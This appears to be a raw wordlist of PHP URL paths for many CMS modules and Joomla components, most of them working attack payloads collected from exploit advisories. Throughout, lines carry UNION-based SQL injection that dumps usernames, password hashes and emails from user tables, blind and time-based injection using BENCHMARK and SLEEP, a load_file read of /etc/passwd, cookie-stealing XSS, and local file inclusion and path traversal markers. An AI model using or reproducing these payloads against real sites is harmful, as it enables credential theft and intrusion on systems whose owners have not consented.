index.php?module=News&do=View&nid=1'+and+1=2+union+select+1,2,concat_ws(0x3a,user_name,user_password,user_email),4,user(),version(),7,8,9,10,11,12,database(),14,15,16,17,18+from+kasseler_users+where+uid=1
index.php?module=News&func=display&sid=3041&title=zikula-1.2.5-released
index.php?module=news&news_op=form&form_name=article&form_action=show&foreign_key_value=[SQL]
index.php?module=Notes&amp;action=index&amp;return_module=Notes&amp;return_action=DetailView
index.php?module=Opportunities&amp;action=index
index.php?module=os_news&view=show&id=3+and+1=0+union+select+all+1,group_concat(username,0x3A,password),3,4,5,6,7,8,9,10+from+admins
index.php?module=os_news&view=show&id=3+and+1=0+union+select+all+1,group_concat(username,0x3A,password),3,4,5,6,7,8,9,10+from+students
index.php?module=os_news&view=show&id=3+and+1=0+union+select+all+1,group_concat(username,0x3A,password),3,4,5,6,7,8,9,10+from+teachers
index.php?module=os_news&view=show&id=[SQLI]
index.php?module=phpManual&file=..
index.php?module=pnEncyclopedia&func=display_term&id=9999 union select 1,2,3,4,5,6,concat(pn_uname,0x3a,pn_pass),8,9,10,11 from nuke_users limit 1,1--
index.php?module=pnEncyclopedia&func=display_term&id=9999 union select 1,2,3,4,5,6,load_file(0x2f6574632f706173737764),8,9,10,11--
index.php?module=pnEncyclopedia&func=display_term&id=9999 union select 1,2,3,4,5,6,version(),8,9,10,11--
index.php?module=profile&action=myaccount
index.php?module=profiles&action=view&id=".$idhack;
index.php?module=Project&amp;action=index
index.php?module=Rss&action=Save&rssurl=http:
index.php?module=search
index.php?module=search HTTP
index.php?module=search&search_op=search&mod=..
index.php?module=sitebuilder&sitebuilder_id=17  ]
index.php?module=[somefile]%00
index.php?module=[sqli]
index.php?module=subjects&func=listcat&catid=[SQL]
index.php?module=subjects&func=listpages&subid=[SQL]
index.php?module=subjects&func=viewpage&pageid=-1+union+select+1,2,3,null,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,null,14,15,16,17--
index.php?module=subjects&func=viewpage&pageid=[SQL]
index.php?module=Tasks
index.php?module=Topics&func=display&topicid=0 AND 1=0
index.php?module=Topics&func=display&topicid=0 AND 1=1
index.php?module=Topics&func=view&topicid=-1 UNION ALL SELECT null,null,concat(pn_uname,0x3a,pn_pass),null,null,null,null from md_users where pn_uid=2
index.php?module=TopSites+1'+and+1=2+union+select+1,concat_ws(0x3a,user_name,user_password,user_email),3,4,5+from+kasseler_users+where+uid=1
index.php?module=uploads&action=downloadfile&
index.php?module=users&action=avatar
index.php?module=users&page=login&event=forgotpassword'
index.php?module=users&page=login&event=[SQL]
index.php?module=user&task=save&elmid=" method="post" name="main">
index.php?module=v4bJournal&func=journal_comment&id=-1
index.php?module=vedipm&inviapm=true
index.php?module=Voting&do=Result&vid=1'+union+select+1,concat_ws(0x3a,user_name,user_password,user_email),3,4,user(),6,version(),8,9,10,11,12,13,14,15+from+kasseler_users+where+uid=1
index.php?module=wiccle&show=download
index.php?modulo=..
index.php?mod=users_add
index.php?mod=users_edit_pub
index.php?month=1&year=9999%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14
index.php?month=1&year=[SQL]
index.php?month=%3E%3Cscript%3Ealert(document.cookie)%3C
index.php?month_no=3&year=%3Cscript%3Ealert
index.php?month=[SQL]
index.php? monthy=2006017'% 20union%20select% 201,2,3,4,5, 6,7,8,9,10
index.php?more=-1 UNION ALL SELECT 1,'long',3,4,5,6,7,8,9,10
index.php?mosConfig_absolute_path=';
index.php?mosConfig_absolute_path=[shell script]
index.php?mpfn=pdview&id=1'
index.php?mpfn=pdview&id=-1+union+select +1,2,3,4,5,group_concat(email,0x3a,password,0x3a,level),7,8,9,10,11,12,13,14,15,16+from+xusers
index.php?mp_id=1 BLIND SQL INJECTION 
index.php?mp_id='><script>alert(document.cookie)<
index.php?mp_id=sql[N.A.S.T ]
index.php?m=projects
index.php?m=projects&a=addedit
index.php?m=projects&a=view&project_id=2
index.php?m=projects&user_cookie=1
index.php?m=recipes&a=search&search=yes&base_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users--
index.php?m=recipes&a=search&search=yes&course_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users--
index.php?m=recipes&a=search&search=yes&course_id=5+union+all+select+1,2,user_name,4,5,6,7+from+security_users--
index.php?m='><script>alert('test');<
index.php?msg=*
index.php?msg=<script>alert('br0ly')<
index.php?msgs=<html><body>VULN BY<br>t0pP8uZz<br>h4cky0u.org<
index.php?msgs=[HTML, JAVASCRIPT]
index.php?m=system&a=custom_field_editor
index.php?m=tasks
index.php?m=td_download&o=download&file_id=43
index.php?_m=tickets&_a=manage&s_query=">
index.php?_m=tickets&_a=manage&s_query="> 
index.php?m=ticketsmith&a=post_ticket
index.php?m=ticketsmith&a=view&ticket=-2union
index.php?m=top"><script>alert()<
index.php?m=top"><SCRIPT>alert()<
index.php?m=top&s=info&ID=1115946293.3552"><SCRIPT>alert()<
index.php?m=top&s=info"><script>alert()<
index.php?m=top&s=info&t=comments&ID=1114815037.2498"><SCRIPT>alert()<
index.php?m=top&s=info&t=comments&paso=1&ID=1111068112.7598"><SCRIPT>alert()<
index.php?m=video&v=[VALID-ID][SQL]
index.php?myPlantId=9
index.php?n=
index.php\n";
index.php?n=1&id=-1+union+select+1,version()--
index.php -n 4 -c SMFCookie218=a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%222%22%3Bi%3A1%3Bs%3A40%3A%22091feddbd31bfa96932a5e4e6c34cb36f2686c1a%22%3Bi%3A2%3Bi%3A1378168836%3Bi%3A3%3Bi%3A1%3B%7D 
index.php?n=62&id=-57+union+select+1,version()--
index.php -n admin
index.php?name=-1'
index.php?name=CmodsDownload&file=index&req=getit&lid=14
index.php?name=coppermine&file=thumbnails&album=1"><script>alert()<
index.php?name=Downloads&c=1"><script>alert()<
index.php?name=Downloads&req=search&query=[Program name]&show=10%20INTO%20OUTFILE%20'
index.php?name=Downloads&req=search&query=&show=cXIb8O3
index.php?name=Downloads&req=viewdownload&cid=1&show=[SQL%20INJECTION] 
index.php?name=files&op=add (use temper data)
index.php" name="g" id="g">
index.php?name=index
index.php?name=News&catid=1"><script>alert()<
index.php?name=News&file=article&sid=7"><script>alert()<
index.php?name=News&file=friend&sid=5"><script>alert()<
index.php?name=News&file=submit
index.php?name=pagetool_news&news_id=-1
index.php?name=&price_from=&price_to=&city=&state=SC&mls=[SQL]&bathroom=-1&bedrooms=-1&go=search&results=1 
index.php?name=Stories_Archive&sa=show_all"><script>alert()<
index.php?name=Stories_Archive&sa=show_month&year=2005&month=11"><script>alert()<
index.php?name=Stories_Archive&sa=show_month&year=2005"><script>alert()<
index.php?name=Surveys&op=results&pollid=5"><script>alert()<
index.php?name=Surveys&op=results"><script>alert()<
index.php?name=webboard&category=1+and+1=2+union+select+concat(username,0x3A,password)+from+web_admin
index.php?name=Web_Links&l_op=toprated&ratenum=5&ratetype=percent"><script>alert()<
index.php?name=Web_Links&l_op=viewlink&cid=15&min=10&orderby=title%20ASC&show=0"><script>alert(document.cookie)<
index.php?name=Web_Links&l_op=viewlink&cid=15&orderby=titled"><script>alert()<
index.php?name=Web_Links&l_op=viewlink&cid=15"><script>alert()<
index.php?name=Your_Account&error=1"><script>alert(document.cookie)<
index.php?name=Your_Account&error=1&uname=bGFsYWxh"><script>alert(document.cookie)<
index.php?name=Your_Account&error=1&uname=PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+
index.php?name=Your_Account&profile=3"><script>alert(document.cookie)<
index.php?name=Your_Account&profile=anyone"><script>alert('foo')<
index.php?navi=..
index.php?ncharacter='
index.php?ncharacter[]
index.php?ncharacter=-1+union+select+@@version,null,null--
index.php?new_a=addalbum&artist_id=[sqli]
index.php?newlang=..
index.php?&news_act=read&news_id=-1+UNION SELECT 1,2,3,4,5,concat(username,0x3a,password),7,8+from+demo_users--
index.php?newsID=-99%20union%20all%20select 1, 2,concat(user_login,0x20,0x3a,0x20,user_passwd),4, 5, 6, 7, 8, 9, 10, 11%20from%20authuser
index.php?news_include_path=[script]
index.php?n=ftp:
index.php?n=guest&c=0&m=forum&s=1&forum_id=-1' UNION ALL SELECT 1,2,CONCAT(nick, 0x3a, pwd),4,5,6,7,8 FROM com_users%23
index.php?n=guest&c=0&m=forum&s=2&forum_id=0&topic_id=-1' UNION ALL SELECT GROUP_CONCAT(CONCAT(nick, 0x3a, pwd)) FROM com_users%23
index.php?n=guest&c=0&m=search&s=forum&wert=-1%25" UNION ALL SELECT 1,2,3,4,CONCAT(nick, 0x3a, pwd),6 FROM com_users%23
index.php?n=guest&c=0&m=search&s=id&wert=-1%25" UNION ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23
index.php?n=guest&c=0&m=search&s=nick&wert=-1%25" UNION ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23
index.php?n=modules
index.php?no=75+union+select+0,convert(database()%20using%20latin1),2,convert(user()%20using%20latin1)--
index.php?node=system&op=..
index.php?node=system&op=blockop&block=3&bop=..
index.php?node=system&op=extop&ext=..
index.php?node=system&op=extop&ext=statman&eop=
index.php?node=system&op=extop&ext=statman&eop=..
index.php?no=[ Sql Code]
index.php?nsextt='"<script>alert(document.cookie)<
index.php?num=21
index.php?numbers[]
index.php?n=xx&id=[SQL]
index.php?o=-1
index.php?obj_id=
index.php?obj=sections&id=-1 UNION SELECT concat(username,0x3a,password) FROM users--
index.php?offset=[SQL]
index.php?online
index.php?op=..
index.php?op[]=1
index.php?op=1&name=..
index.php?op=%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2FattackerControlledDirectory
index.php?op=admin&name=users
index.php?op=aff&optio n=0&url=..
index.php?op=aff&option=0&url=..
index.php?op=buscar&query=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C
index.php?op=buscar&query=<script language=javascript>window.alert(document.cookie);<
index.php?opc=1
index.php?opcao=1>'><ScRiPt %0A%0D>alert(439286918587)%3B<
index.php?op=Default&Date=0'%20UNION%20SELECT%201,password,1,1,1,1,1,1,1,1%20FROM%20lt_users%20WHERE%20id='1'
index.php?op=Default&Date=0'%20UNION%20SELECT%201,user,1,1,1,1,1,1,1,1%20FROM%20lt_users%20WHERE%20id='1'
index.php?op=language&lang=1
index.php?op=login&submit=submit&submit=submit&username=111-222-1933email@address.tst&password=111-222-1933email@address.tst&new_language="+onmouseover=alert(39660.2316362732)+
index.php?op=newtopic&mode=ris&quale=[abducter]&page=1
index.php?op=pass&name=users
index.php?op=pre&title=<script>alert(document.cookie);<
index.php?op=profile&user=%3Cscript%3Ealert(document.cookie);%3C
index.php?op=profile&user=[abducter]
index.php?op=search&speed_debug=on&sites=')UNION+SELECT+SLEEP(5)%23
index.php?op=search&speed_debug=on&sites=waraxe
index.php?option=\
index.php?option=articles&task=viewarticle&artid=5%20UNION%20somequery 
index.php?option=btg_oglas&id=<script>alert(document.cookie)<
index.php?option=com_aardvertiser&cat_name=conf&task=
index.php?option=com_aardvertiser&cat_name=conf&task= [lfi]
index.php?option=com_aardvertiser&cat_name=Vehicles'+AND+'1'='1&task=view
index.php?option=com_aardvertiser&task=
index.php?option=com_aardvertiser&task= [lfi]
index.php?option=com_abbrev&controller=..
index.php?option=com_ab_gallery&Itemid=37&gallery=
index.php?option=com_about&task=view&id=-24+UNION SELECT 1,2,3,group_concat(username,0x3a,password,0x3a,email),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+jos_users--
index.php?option=com_aclassf&Itemid=26&ct=merch5&md=details&id=6468+and+substring(@@version,1,1)=4
index.php?option=com_aclassf&Itemid=26&ct=merch5&md=details&id=6468+and+substring(@@version,1,1)=5
index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438   and 1=1 <= TRUE
index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438   and 1=2 <= FALSE
index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438+AND SUBSTRING(@@version,1,1)=5
index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=[BLIND]
index.php?option=com_acmisc&page=5&Itemid=null
index.php?option=com_acnews&page=1&Itemid=-1+UNION+SELECT+1,2,concat%28username,0x20,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20mos_users--
index.php?option=com_acooldebate&controller={LFI}
index.php?option=com_acteammember&id=-1+UNION+SELECT+1,2,3,4,5,concat(username,0x20,password),7,8,9,10,11,12,13,14,15+from+mos_users--&Itemid=121&lang=en
index.php?option=com_actions&actionid=-1 UNION SELECT 1,2,3,4,5,6,7--
index.php?option=com_actions&actionid=[SQL]
index.php?option=com_adagency&controller= [-LFI-]
index.php?option=com_addressbook&controller=..
index.php?option=com_addressbook&controller=[LFI]
index.php?option=com_addressbook&view=contact&Itemid=[Bsqli]
index.php?option=com_adds&action=view&catid=12+AND+1=0+UNION+SELECT+1,2--
index.php?option=com_adds&action=view&catid=[Blind SQL]
index.php?option=com_advertising&controller=..
index.php?option=com_advertising&controller=[LFI]
index.php?option=com_agency&task=view&aid=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14
index.php?option=com_agency&task=view&aid=[SQL]
index.php?option=com_agoragroup&con=groupdetail&id=2+and+ascii(substring((SELECT+concat(username,0x3a,password)+from+jos_users+limit+0,1),1,1))=72
index.php?option=com_agoragroup&con=groupdetail&id=2+and+(select+substring(concat(1,password),1,1)+from+jos_users+limit+0,1)=1
index.php?option=com_agoragroup&con=groupdetail&id=2+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1
index.php?option=com_agoragroup&con=groupdetail&id=2[SQL code]
index.php?option=com_agora&task=profile&page=avatars&action=
index.php?option=com_agora&task=profile&page=avatars&action=  [-LFI-]
index.php?option=com_agora&task=upload
index.php?option=com_akobook&Itemid=31
index.php?option=com_akobook&Itemid=36&func=sign&action=reply&gbid=-1%20+%20birliği%20+%20+1,2,3,4,5,6,7,8,9%20seçin%20,%2010,11,12,13,14,15,%2016,17,18,19%20
index.php?option=com_akobook&Itemid=36= ( SQL code )
index.php?option=com_akogallery&Itemid=91&func=detailgallerie&id=-10+UNION SELECT 1,2,concat(username,0x3a,password,0x3a,email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+mos_users
index.php?option=com_alameda&controller=comments&task=edit&storeid=1[SQL]
index.php?option=com_alameda&controller=comments&task=edit&storeid=-1+union+all+select+concat_ws(0x3a,username,password)+from+jos_users--
index.php?option=com_album&Itemid=128&target=
index.php?option=com_alfresco&task=edit&id_pan=[SQL INJ.]
index.php?option=com_alfurqan15x&action=viewayat&surano=-999.9+UNION+ALL+SELECT+1,concat_ws(0x3a,username,0x3a,password)kaMtiEz,3,4,5+from+jos_users--
index.php?option=com_alfurqan15x&action=viewayat&surano=[BunciteRs]
index.php?option=com_allcinevid&tmpl=component&id=1 and 1=0
index.php?option=com_allcinevid&tmpl=component&id=1 and 1=1
index.php?option=com_allhotels&task=showhoteldetails&id=1+and%20substring(@@version,1,1)=4
index.php?option=com_allhotels&task=showhoteldetails&id=1+and%20substring(@@version,1,1)=5
index.php?option=com_allvideos&id=1339
index.php?option=com_allvideos&id=1339[c0de]
index.php?option=com_alphauserpoints&view=..
index.php?option=com_alphauserpoints&view=[LFI]
index.php?option=com_amblog&task=article&articleid=-1 UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users
index.php?option=com_amblog&task=delete&articleid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
index.php?option=com_amblog&task=editcommentform&articleid=-1 UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users
index.php?option=com_amblog&task=editform&articleid=-1 UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users
index.php?option=com_amblog&task=editsave&articleid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
index.php?option=com_amblog&task=newform&catid=-1 UNION SELECT 1,CONCAT(username,0x3a,password) FROM jos_users
index.php?option=com_amblog&task=saveeditcomment&articleid=-1 UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users
index.php?option=com_amblog&task=savenewcomment&articleid=-1 UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users
index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@version
index.php?option=com_ambrasubs&controller=subscription&task=new&id=6
index.php?option=com_amocourse&task=view&view=category&catid=29+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12+from+jos_users--
index.php?option=com_amocourse&task=view&view=category&catid=n[SQL code]
index.php?option=com_annonces&view=edit&Itemid=1 
index.php?option=com_appointinator&view=App&aid=-1 UNION SELECT 1,CONCAT(username,0x3A,password),3,4,5,6 FROM jos_users
index.php?option=com_appointment&controller=..
index.php?option=com_appointment&controller=[LFI]
index.php?option=com_arcadegames&controller=..
index.php?option=com_arcadegames&controller=[LFI]
index.php?option=com_archeryscores&controller=..
index.php?option=com_archeryscores&controller=[LFI]
index.php?option=com_articlemanager&Itemid=349&task=display&artid=
index.php?option=com_articleman&task=new
index.php?option=com_articles&task=view_addarticles&sid=9999+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10+from+jos_users
index.php?option=com_articles&task=view_addarticles&sid=[SQL]
index.php?option=com_artist&idgalery=Sql
index.php?option=com_artportal&portalid=1%20union%20all%20select%201,2,3,4,5,6,version(),8,9--
index.php?option=com_artportal&portalid=1 and 1=1 => True
index.php?option=com_artportal&portalid=1 and 1=2 => False
index.php?option=com_artportal&portalid=1 and and 1=1 => True
index.php?option=com_artportal&portalid=1 and substring(@@version,1,1)=4 => False
index.php?option=com_artportal&portalid=1 and substring(@@version,1,1)=5 => True
index.php?option=com_artportal&portalid=1 union all select 1,2,3,4,5,6,version(),8,9--
index.php?option=com_autartimonial&view=autartimonial&limit=[sqli]
index.php?option=com_avosbillets&task=view&view=event&id=374
index.php?option=com_avosbillets&task=view&view=event&id=-463+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users--
index.php?option=com_awd_song&task=view&id=4
index.php?option=com_awdwall&controller=..
index.php?option=com_awdwall&controller=[LFI]
index.php?option=com_awdwall&view=awdwall&Itemid=1&cbuser=1[SQL]
index.php?option=com_awdwall&view=awdwall&Itemid=1&cbuser=-1+union+select+1,2,3,4,5,6,group_concat(username,0x3a,password),8,9,10,11,12+from+jos_users--
index.php?option=com_awiki&controller=..
index.php?option=com_awiki&controller=[LFI]
index.php?option=com_b2portfolio&c=-1 UNION SELECT 1,concat(username,0x34,password),3,4,5 FROM jos_users
index.php?option=com_bca-rss-syndicator&controller=..
index.php?option=com_bca-rss-syndicator&controller=[LFI]
index.php?option=com_beamospetition&pet=-5 UNION SELECT user(),user(),user(),user(),user(),user(),user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user() FROM jos_users--
index.php?option=com_beamospetition&pet={SQL}
index.php?option=com_beamospetition&startpage=3&pet=-1
index.php?option=com_beamospetition&startpage=3&pet=1[SQL]
index.php?option=com_bearleague&task=team&tid=8&sid=1&Itemid=%27
index.php?option=com_beeheard&controller=..
index.php?option=com_beeheard&controller=[LFI]       << Old version
index.php?option=com_beeheard&controller=suggestions&view=suggestions&layout=list&category_id=2 and 1=0
index.php?option=com_beeheard&controller=suggestions&view=suggestions&layout=list&category_id=2 and 1=1
index.php?option=com_beeheardlite&controller=..
index.php?option=com_beeheardlite&controller=[LFI]   << New version
index.php?option=com_bfquiztrial&view=bfquiztrial&catid=34"
index.php?option=com_bfquiztrial&view=bfquiztrial&catid=34\""
index.php?option=com_bfsurvey&controller= [-LFI-]
index.php?option=com_bfsurvey_pro&view=bfsurveypro&catid=53"
index.php?option=com_biblestudy&id=1&view=studieslist&controller= [-LFI-]
index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
index.php?option=com_bidding&id=200' <=[SQLi]--
index.php?option=com_bidding&id=-200 UNION ALL SELECT 1,2,
index.php?option=com_biographies&task=showFile&biobookid=-5+union+all+select+1,2,3,concat(username,0x3a,password)+from+jos_users--
index.php?option=com_blogfactory&controller=..
index.php?option=com_blogfactory&controller=[LFI]
index.php?option=com_blog&task=viewdetails&id=-1
index.php?option=com_blog&task=viewdetails&id=[SQL]
index.php?option=com_book&controller=listtour&task=showTour&cid[]=Exploit
index.php?option=com_bookjoomlas&Itemid=26&func=comment&gbid=-1 UNION ALL SELECT 1,2,NULL,4,NULL,6,7,NULL,9,CONCAT(username,0x3a,password),11,12,13,14,15,16 FROM jos_users
index.php?option=com_books&task=book_details&book_id=[exploit]
index.php?option=com_brightweblinks&Itemid=58&catid={SQL}
index.php?option=com_brightweblinks&Itemid=58&catid=<valid_id> UNION SELECT 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17 FROM jos_users WHERE usertype=0x53757065722041646d696e6973747261746f72--
index.php?option=com_brightweblinks&Itemid=58&catid=<valid_id> UNION SELECT 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16 FROM jos_users WHERE usertype=0x53757065722041646d696e6973747261746f72--
index.php?option=com_bsadv&controller=peruse&task=account&id=-1+UNION+ALL+SELECT+database(),version()%23&Itemid=57
index.php?option=com_bsadv&controller=peruse&task=account&id=-1+UNION+ALL+SELECT+username,password+FROM+jos_users+WHERE+id=62%23&Itemid=57
index.php?option=com_bsadv&controller=peruse&task=event&id=-1+UNION+ALL+SELECT+1,concat(username,0x3A3A3A,password),3,4+FROM+jos_users+WHERE+id=62%23
index.php?option=com_bsadv&controller=peruse&task=event&id=-1+UNION+ALL+SELECT+1,version(),database(),user()%23
index.php?option=com_business&view=business&region=37&category_id=-1 UNION SELECT 1,2,3--
index.php?option=com_business&view=business&region=37&category_id=-1 UNION SELECT 1,2,version()--
index.php?option=com_business&view=business&region=37&category_id=[SQL]
index.php?option=com_calendario&task=detalhes&Itemid=88&id=297+and+1=0 false
index.php?option=com_calendario&task=detalhes&Itemid=88&id=297+and+1=1 true
index.php?option=com_camp&task=show&cid=-1
index.php?option=com_camp&task=show&cid=[SQL]
index.php?option=com_cartweberp&controller=[-LFI-]
index.php?option=com_casino&task=category&id=-1%27+union+all+select+1,username,password,4,5+from+jos_users
index.php?option=com_casino&task=category&id=[SQL]
index.php?option=com_casino&task=player&id=-1%27+union+all+select+1,2,password,email,@@version,database(),user(),username+from+jos_users
index.php?option=com_casino&task=player&id=[SQL]
index.php?option=com_catalogproduction&task=viewdetail&id=[exploit]
index.php?option=com_category&id=12&task=view&color=3&cat_id=-9999+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5+from+jos_users--
index.php?option=com_category&task=loadCategory&catid=-9999+AND+1=0+union+all+select%201,2,group_concat(username,0x3a,password),4,5+from+jos_users--
index.php?option=com_category&task=loadCategory&catid*=-9999+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5+from+jos_users--
index.php?option=com_cbresumebuilder&task=group_members&group_id=-666+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+jos_users--
index.php?option=com_cbresumebuilder&task=group_members&group_id=[INDONESIANCODER]
index.php?option=com_ccnewsletter&controller=..
index.php?option=com_ccnewsletter&controller=[LFI]
index.php?option=com_ccnewsletter&view=ccnewsletter&Itemid=87&controller=[-DT-]
index.php?option=com_chronoconnectivity&itemid=1 [Blind-SQL]
index.php?option=com_chronocontact&itemid=1 [Blind-SQL]
index.php?option=com_cinema&Itemid=S@BUN&func=deta%20il&id=-99999
index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=[exploit]
index.php?option=com_ckforms&controller=..
index.php?option=com_ckforms&controller=ckdata&view=ckformsdata&layout=detail&task=detail&fid=2[sql]
index.php?option=com_ckforms&controller=[LFI]
index.php?option=com_clanlist&clanId=-999 union select version()
index.php?option=com_clantools&squad=1+[Blind SQL]
index.php?option=com_clantools&task=clanwar&showgame=1+[Blind SQL]&Itemid=999
index.php?option=com_cmimarketplace&Itemid=70&viewit=
index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1
index.php?option=com_color&view=color&l=-1
index.php?option=com_color&view=color&l=[SQL]
index.php?option=com_comments&task=view&id=-1+UNION+SELECT+0,999999,concat(username,0x3a,PASSWORD),0,0,0,0,0,0+FROM+mos_users+union+select+*+from+mos_content_comments+where+1=1
index.php?option=com_communitypolls&controller=..
index.php?option=com_communitypolls&controller=[INDONESIANCODER]
index.php?option=com_community&view=profile&Itemid=66
index.php?option=com_comp&task=view&cid=-1+UNION+SELECT+1,2--
index.php?option=com_comp&task=view&cid=[SQL]
index.php?option=com_connect&view=connect&controller=..
index.php?option=com_connect&view=connect&controller=[LFI]
index.php?option=com_contactinfo&catid=-9999
index.php?option=com_contactinfo&catid=[exploit]
index.php?option=com_contentbloglist&task=listmonth&year=2010&month=1&section_id=999999+UNION+ALL+SELECT+1,username,3,4,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+jos_users&Itemid=1
index.php?option=com_contentbloglist&task=listmonth&year=2010&month=1&section_id=[SQL]&Itemid=1
index.php?option=com_content&task=blogcategory&id=60&Itemid=99999%20union%20select%201,concat_ws(0x3a,username,password),3,4,5%20from%20jos_users
index.php?option=com_content&task=view&id=15&Itemid=2&limit=1">&lt;script&gt;alert(document.cookie)&lt;
index.php?option=com_content&task=view&id=36&Itemid=1 and 1=0
index.php?option=com_content&task=view&id=36&Itemid=1 and 1=1
index.php?option=com_content&task=view&id=7&Itemid=28
index.php?option=com_content&view=article&id=104&Itemid=131
index.php?option=com_content&view=article&id=22&Itemid=41
index.php?option=com_content&view=article&id=2&Itemid=4
index.php?option=com_content&view=article&id=3
index.php?option=com_content&view=article&id=41&Itemid=40
index.php?option=com_content&view=article&id=44 and 1=1
index.php?option=com_content&view=article&id=44 and 1=2
index.php?option=com_content&view=article&id=46+AND+1=if(substring(@@version,1,1)=4,BENCHMARK(9999999,md5(@@version)),1)%23
index.php?option=com_content&view=article&id=46+AND+1=if(substring(@@version,1,1)=5,BENCHMARK(9999999,md5(@@version)),1)%23
index.php?option=com_content&view=article&id=53:icrmbasic&catid=34:general&Itemid=481
index.php?option=com_content&view=article&id=[A VALID ID]&Itemid=[A VALID ID]&sflaction=dir&sflDir=..
index.php?option=com_content&view=article&id= {EV!L EXPLO!T}
index.php?option=com_content&view=article&id=[SQL]
index.php?option=com_content&view=article&layout=form&Itemid=51
index.php?option=com_content&view=category&layout=blog&id=11&Itemid=18
index.php?option=com_content&view=frontpage&setLang=en-GB&Itemid=1
index.php?option=com_countries&locat=[SQL INJ.]
index.php?option=com_crowdsource&view=design&cid=-3
index.php?option=com_custompages&cpage=URL
index.php?option=com_cvmaker&controller=..
index.php?option=com_cvmaker&controller=[LFI]
index.php?option=com_dailymeals&view=dailymeals&controller=[-LFI-]
index.php?option=com_dailymessage&Itemid=31&page=drivers&id=-7+union+select+1,concat(username,char(58),password)KHG,3+from+jos_users--
index.php?option=com_dailymessage&Itemid=31&page=faq&id=-7+union+select+concat(username,char(58),password)KHG,2,3+from+jos_users--
index.php?option=com_dashboard&controller=..
index.php?option=com_datafeeds&controller=..
index.php?option=com_datafeeds&controller=[LFI]
index.php?option=com_dateconverter&Itemid=[] <== SQL-i
index.php?option=com_dcnews&view=dcnews&controller=..
index.php?option=com_dcnews&view=dcnews&controller=[LFI]
index.php?option=com_dcs_flashgames&Itemid=61&catid=51+union+all+select+1,2,user(),4,@@version,6,concat_ws(0x3a,username,password)+from+jos_users--
index.php?option=com_dcs_flashgames&Itemid=kaMtiEz&catid=[INDONESIANCODER]
index.php?option=com_delicious&controller=..
index.php?option=com_delicious&controller=[LFI]
index.php?option=com_departments&id=-1 UNION SELECT 1,2,3,4,5,6,7,8--
index.php?option=com_departments&id=-1 UNION SELECT 1,version(),3,4,5,6,7,8--
index.php?option=com_departments&id=[SQL]
index.php?option=com_dhforum&view=grouplist&id=-1+union+select+concat
index.php?option=com_dhforum&view=grouplist&id=[SQL]
index.php?option=com_diary&controller=..
index.php?option=com_diary&controller=[LFI]
index.php?option=com_digifolio&view=project&id=4
index.php?option=com_digifolio&view=project&id=[xxx]
index.php?option=com_digistore&controller=digistoreProducts&task=list&cid[]=-2
index.php?option=com_digistore&task=list_products&id=1&Itemid=32
index.php?option=com_digistore&task=show_product&pid=1"
index.php?option=com_dioneformwizard&controller=[LFI]%00
index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=1' union all select concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e)--+a
index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=1' union all select (select concat(0x7e,0x27,count(table_name),0x27,0x7e) from `information_schema`.tables where table_schema=0x6F7574706F7374715F6F65646576)--+a
